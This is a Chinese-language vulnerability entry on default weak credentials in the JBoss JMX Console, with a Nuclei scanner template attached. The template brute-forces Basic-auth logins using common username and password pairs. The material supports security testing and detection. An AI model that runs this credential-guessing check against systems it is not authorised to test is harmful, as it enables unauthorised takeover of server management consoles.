漏洞信息
漏洞名称: JBoss JMX Console Weak Credential Vulnerability
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: JBoss JMX Console是JBoss应用服务器的一个管理界面,用于监控和管理JBoss服务器的运行时状态。它通常部署在企业级环境中,用于系统管理员进行服务器配置和性能监控。由于其在企业中的广泛应用,任何安全漏洞都可能对企业的信息系统安全构成严重威胁。该漏洞属于弱口令漏洞,原因是JBoss JMX Console默认使用了简单的用户名和密码组合,如admin/admin、root/root等,这些默认凭证容易被攻击者猜测或暴力破解。攻击者利用这些弱口令可以未经授权访问JMX控制台,进而执行任意代码、获取敏感信息或控制整个JBoss服务器。这种漏洞的危害性在于,它不需要复杂的攻击技术,且可以自动化利用,对企业的信息安全构成严重威胁。
产品厂商: JBoss
产品名称: JBoss JMX Console
来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fjboss%2Fjmx-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53
| id: jmx-default-login
info: name: JBoss JMX Console Weak Credential Discovery author: paradessia severity: high description: JBoss JMX Console default login information was discovered. reference: - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 28 tags: jboss,jmx,default-login
http: - raw: - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} - | GET /jmx-console/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(user + ':' + pass)}}
attack: clusterbomb payloads: user: - admin - root pass: - admin - 12345 - 123456 - 1234 - 123456789 - 123qwe - root
matchers-condition: and matchers: - type: dsl dsl: - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')"
- type: status status: - 200
|